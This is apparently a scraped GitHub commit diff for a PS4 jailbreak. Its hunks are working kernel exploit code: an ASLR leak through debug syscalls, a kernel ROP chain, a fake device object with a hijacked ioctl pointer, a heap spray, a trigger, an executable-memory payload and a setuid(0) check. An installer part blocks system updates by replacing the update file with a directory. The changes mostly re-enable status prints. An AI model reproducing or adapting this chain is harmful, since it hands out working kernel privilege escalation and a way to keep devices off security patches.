xvortex
diff --git a/‎exploit/index.html
+21-21 b/‎exploit/index.html
+21-21
diff --git a/‎exploit/payload.js
+1-1 b/‎exploit/payload.js
+1-1
diff --git a/‎installer/Makefile
+1-1 b/‎installer/Makefile
+1-1
diff --git a/‎installer/include/defines.h
+1-1 b/‎installer/include/defines.h
+1-1
diff --git a/‎installer/source/main.c
+6-3 b/‎installer/source/main.c
+6-3
@@ -396,17 +396,17 @@
 
       if(kexploitCheck == 0)
       {
-        //print("Status: Kernel Patched!");
+        print("Status: Kernel Patched!");
       }
 
       if(kexploitCheck != 0)
       {
-        //print("Status: Kernel Not Patched...");
+        print("Status: Kernel Not Patched...");
         print("=== Starting Kernel Exploit Chain ===");
 
         //////////////// SETUP ////////////////
 
-        //print("Allocating Buffers...");
+        print("Allocating Buffers...");
 
         // Setup buffers for important pre-exploit stuff
         var kernelBase = malloc(0x08);
@@ -437,7 +437,7 @@
 
         //////////////// LEAK ////////////////
 
-        //print("Calculating ASLR and Object Base...");
+        print("Calculating ASLR and Object Base...");
 
         p.write8(namedObj, p.syscall('sys_namedobj_create', stringify("debug"), 0xDEAD, 0x5000));
 
@@ -462,14 +462,14 @@
           return false;
         }
 
-        //print("Kernel base: 0x" + kernelBase);
-        //print("Object leak: 0x" + objBase);
+        print("Kernel base: 0x" + kernelBase);
+        print("Object leak: 0x" + objBase);
 
         p.write8(serviceBuff.add32(0x4), objBase);
         p.writeString(serviceBuff.add32(0x28), "debug");
 
         //////////////// BUILD KROP CHAIN ////////////////
-        //print("Building Kernel ROP Chain...");
+        print("Building Kernel ROP Chain...");
 
         var kchainstack = malloc(0x200);
         var kchain = new krop(p, kchainstack);
@@ -524,10 +524,10 @@
         kchain.push(window.gadgets["pop rsp"]);
         kchain.push(window.gadgets["push rax; jmp rcx"]);
 
-        //print("KROP chain size: " + kchain.count);
+        print("KROP chain size: " + kchain.count);
 
         //////////////// FAKE THE OBJECT ////////////////
-        //print("Creating Fake Object...");
+        print("Creating Fake Object...");
 
         //////// FAKE CDEV_PRIV ////////
         p.write8(obj_cdev_priv.add32(0x008), 0x0000000000000004);
@@ -549,14 +549,14 @@
         p.write8(obj_cdevsw.add32(0x38), libcBase.add32(0xa826f)); // d_ioctl - TARGET FUNCTION POINTER
 
         //////////////// FREE THE OBJECT ////////////////
-        //print("Freeing the object!");
+        print("Freeing the object!");
 
         var stage3 = new saferop(p, undefined);
 
         stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_mdbg_service']]), 1, serviceBuff, 0);
         stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_namedobj_delete']]), p.read8(namedObj), 0x5000);
 
-        //print("Spraying the heap!");
+        print("Spraying the heap!");
 
         for(var i = 0; i < 500; i++)
         {
@@ -566,12 +566,12 @@
         stage3.run();
 
         //////////////// TRIGGER ////////////////
-        //print("Triggering kernel code execution");
+        print("Triggering kernel code execution");
 
         p.syscall('sys_ioctl', p.read8(targetDevFd), 0x81200000, obj_cdev_priv);
 
         //////////////// FIX ////////////////
-        //print("Allocating executable memory for fix payload...");
+        print("Allocating executable memory for fix payload...");
 
         var baseAddressExecute = new int64(0xDEAD0000, 0);
         var exploitExecuteAddress = p.syscall("sys_mmap", baseAddressExecute, 0x10000, 7, 0x1000, -1, 0);
@@ -587,7 +587,7 @@
             p.write4(shellcode.add32(i * 4), fix[i]);
         }
 
-        //print("Running fix payload...");
+        print("Running fix payload...");
 
         var stage6 = new saferop(p, undefined);
 
@@ -603,8 +603,8 @@
       // Display results
       print("=== Verifying kexploit patches ===");
 
-      //print("setuid(0): " + p.syscall('sys_setuid', 0));
-      //print("getuid():  " + p.syscall('sys_getuid'));
+      print("setuid(0): " + p.syscall('sys_setuid', 0));
+      print("getuid():  " + p.syscall('sys_getuid'));
 
       // Create payload memory
       print("=== Launching Payload ===");
@@ -636,20 +636,20 @@
           for (;;)
           {
               var result = p.call(libkernel.add32(0x11570), thread_id_ptr, 0, code_addr, 0, thread_name);
-              //print("scePthreadCreate: 0x" + result);
+              print("scePthreadCreate: 0x" + result);
               if (result == 0)
               {
                   var thread_id = p.read8(thread_id_ptr);
-                  //print("thread: 0x" + thread_id);
+                  print("thread: 0x" + thread_id);
                   var result = p.call(libkernel.add32(0x11610), thread_id, exit_code_ptr);
 
-                  //print("scePthreadJoin: 0x" + result);
+                  print("scePthreadJoin: 0x" + result);
                   if (result == 0)
                   {
                       var exit_code = p.read8(exit_code_ptr);
-                      //print("exit code: " + exit_code);
+                      print("exit code: " + exit_code);
                       print("=== Done ===");
-                      alert(document.getElementById("console").innerHTML);
+                      alert("Done");
                       break;
                   }
               }
 
@@ -10,7 +10,7 @@ ODIR	:=	build
 SDIR	:=	source
 IDIRS	:=	-I$(LIBPS4)/include -I. -Iinclude
 LDIRS	:=	-L$(LIBPS4) -L. -Llib
-CFLAGS	:=	$(IDIRS) -Os -std=gnu11 -fno-builtin -nostartfiles -nostdlib -fno-strict-aliasing -Wall -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
+CFLAGS	:=	$(IDIRS) -O3 -std=gnu11 -fno-builtin -nostartfiles -nostdlib -fno-strict-aliasing -Wall -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
 SFLAGS	:=	-nostartfiles -nostdlib -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
 LFLAGS	:=	$(LDIRS) -Xlinker -T $(LIBPS4)/linker.x -Wl,--build-id=none -Ttext=$(TEXT) -Tdata=$(DATA)
 CFILES	:=	$(wildcard $(SDIR)/*.c)
 
@@ -1,7 +1,7 @@
 #ifndef __DEFINES
 #define __DEFINES
 
-#define VERSION "1.1"
+#define VERSION "1.2"
 
 //#define DEBUG_SOCKET
 
 
@@ -7,6 +7,7 @@
 #define kernel_printf(format, ...) (void)0
 
 #define PS4_UPDATE_FULL_PATH "/update/PS4UPDATE.PUP"
+#define PS4_UPDATE_TEMP_PATH "/update/PS4UPDATE.PUP.net.temp"
 
 const uint8_t payload_data_const[] =
 {
@@ -284,16 +285,18 @@ int kernel_payload(struct thread *td, struct kernel_payload_args* args)
 
 static inline void patch_update(void)
 {
-  DIR* directory = opendir(PS4_UPDATE_FULL_PATH);
+  unlink(PS4_UPDATE_FULL_PATH);
+
+  DIR* directory = opendir(PS4_UPDATE_TEMP_PATH);
 
   if(directory != NULL)
   {
     closedir(directory);
     return;
   }
 
-  unlink(PS4_UPDATE_FULL_PATH);
-  mkdir(PS4_UPDATE_FULL_PATH, 0777);
+  unlink(PS4_UPDATE_TEMP_PATH);
+  mkdir(PS4_UPDATE_TEMP_PATH, 0777);
 }
 
 int _main(struct thread *td) {
Original file line number	Diff line number	Diff line change
`@@ -7,6 +7,7 @@`
`7`	`7`	`#define kernel_printf(format, ...) (void)0`
`8`	`8`
`9`	`9`	`#define PS4_UPDATE_FULL_PATH "/update/PS4UPDATE.PUP"`
	`10`	`+#define PS4_UPDATE_TEMP_PATH "/update/PS4UPDATE.PUP.net.temp"`
`10`	`11`
`11`	`12`	`const uint8_t payload_data_const[] =`
`12`	`13`	`{`
`@@ -284,16 +285,18 @@ int kernel_payload(struct thread td, struct kernel_payload_args args)`
`284`	`285`
`285`	`286`	`static inline void patch_update(void)`
`286`	`287`	`{`
`287`		`- DIR* directory = opendir(PS4_UPDATE_FULL_PATH);`
	`288`	`+ unlink(PS4_UPDATE_FULL_PATH);`
	`289`	`+`
	`290`	`+ DIR* directory = opendir(PS4_UPDATE_TEMP_PATH);`
`288`	`291`
`289`	`292`	`if(directory != NULL)`
`290`	`293`	`{`
`291`	`294`	`closedir(directory);`
`292`	`295`	`return;`
`293`	`296`	`}`
`294`	`297`
`295`		`- unlink(PS4_UPDATE_FULL_PATH);`
`296`		`- mkdir(PS4_UPDATE_FULL_PATH, 0777);`
	`298`	`+ unlink(PS4_UPDATE_TEMP_PATH);`
	`299`	`+ mkdir(PS4_UPDATE_TEMP_PATH, 0777);`
`297`	`300`	`}`
`298`	`301`
`299`	`302`	`int _main(struct thread *td) {`